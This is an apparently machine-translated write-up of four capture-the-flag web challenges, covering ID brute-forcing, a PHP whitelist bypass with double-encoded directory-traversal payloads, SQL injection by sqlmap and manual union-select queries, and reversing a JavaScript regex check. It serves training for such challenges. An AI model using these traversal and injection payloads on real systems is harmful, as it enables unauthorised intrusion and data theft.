CTF_ Web: advanced problem WP (5-8) of attack and defense world expert zone

Continuous updating ing

0x05 ics-06

Title Description ： The cloud platform report center collects data on basic equipment management services , But the data was deleted , Only one place left traces of intruders .
Open the title and find that only report management can be clicked , The answer should be here , But the query is also false ,url There are parameters in id, But no injection , No matter how you input it, there will be no error , Change some id Give it a try , All findings are returned , Contact questions are hidden somewhere , Blast id Number .
Use burp Grab the bag for id test , Generate 1-10000 Of id Number .

stay id=2333 Return different , And the response number is 200.
find flag.

0x06 warmup

Title Description ： source HCTF 2018
Check the source code and find source.php, Access to view code .

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

The key part is if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])), It can be seen that as long as the incoming file Parameter is not empty 、 Is string 、 Satisfy checkFile The conditions are good .
stay checkFile There are several important functions in that need our attention ：

in_array($page, $whitelist) ' testing page Is the content in the whitelist '
mb_substr($page, 0,mb_strpos($page . '?', '?') ' Intercept the content before the specified location '
mb_strpos($page . '?', '?') ' Return to the position where the question mark first appears '

That is, the file name in the white list before the question mark .
visit index.php?file=hint.php Get a hint .

Here we need to make check Function returns true , There are two places to use , One is index.php?file=hint.php?/../../../../ffffllllaaaagggg
or index.php?file=hint.php%3f/../../../../ffffllllaaaagggg
Here are these two payload It's the same , Because the browser will automatically decode once , All passed the second whitelist test , Did not enter urldecode The part , It can also be seen from the local recurrence .
Passed the second time return Return to true , But I want to include An error occurred while processing the file , Because there is no such file name , And cross directory also failed , There are many big men here wp Dissimilarity , Maybe it's environmental ？.
Here's the third one payload
index.php?file=hint.php%253f/../../../../ffffllllaaaagggg
This will be the third time check Success returns true , Because the browser still cannot find the question mark after decoding ?, From the local return, we can also see .

stay include File causes directory traversal to succeed , Here, it is directly used for local reproduction ? Separation is no good , I don't know why many big men write payload Use it directly ? Can ,（ This should be the environment linux Why .） Local replication can only be performed by encoding the incoming file twice so that there is no cross directory .

–8.28 Update reason –

here payload The reason for the difference should be win Cannot create file name with ? And Linux Sure , So in include when win Will report an error directly , But the context of the topic should be linux, So many bigwigs payload It's all right ...
So there are many payload It's all right ,linux It's not sensitive

0x07 NewsCenter

Title Description ： If the subject environment reports an error , Just wait a moment to refresh .

Inquire about 1 And 1’ The returned page is different , Indicates that there is an injection vulnerability .
You can capture packets and save them as a.txt, Use it directly sqlmap -r a.txt -T secret_table -C fl4g --dump A shuttle , Get the results .

We also test our mastery by hand .

 use first order by X, Determine the number of fields , here 4 Error returned when , Description of 3 A field .
1' union select 1,2,3 #, Then use the joint query to determine the echo location .

Found echoed in the last two fields , Replace different phrases , Query sensitive information .
' union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # Query all table names .
' union select 1,2,column_name from information_schema.columns where table_name="secret_table" # Query the fields in the corresponding table .
' union select 1,2,fl4g from secret_table# Inquire about fl4g Value .

0x08 NaNNaNNaNNaN-Batman

Title Description ： tinyctf-2014
In the given package is a js Source code , After finishing, it is ：

function $(){
var e=document.getElementById("c").value;
if(e.length==16)
	if(e.match(/^be0f23/)!=null)
		if(e.match(/233ac/)!=null)
			if(e.match(/e98aa$/)!=null)
				if(e.match(/c7be9/)!=null){
					var t=["fl","s_a","i","e}"];
					var n=["a","_h0l","n"];
					var r=["g{","e","_0"];
					var i=["it'","_","n"];
					var s=[t,n,r,i];
					for(var o=0;o<13;++o){
						document.write(s[o%4][0]);s[o%4].splice(0,1)
						}
					}
				}
				document.write('<input id="c"><button οnclick=$()>Ok</button>');

It can be found that when the input satisfies the above regularity and the input length is 16 that will do .
be0f23 233ac e98aa c7be9
The present length is obviously larger than 16 了 , The results need to be merged .
be0f233ac by 9 position
c7be98aa by 8 position , Merge intermediate c, just 16 position , Input be0f233ac7be98aa that will do .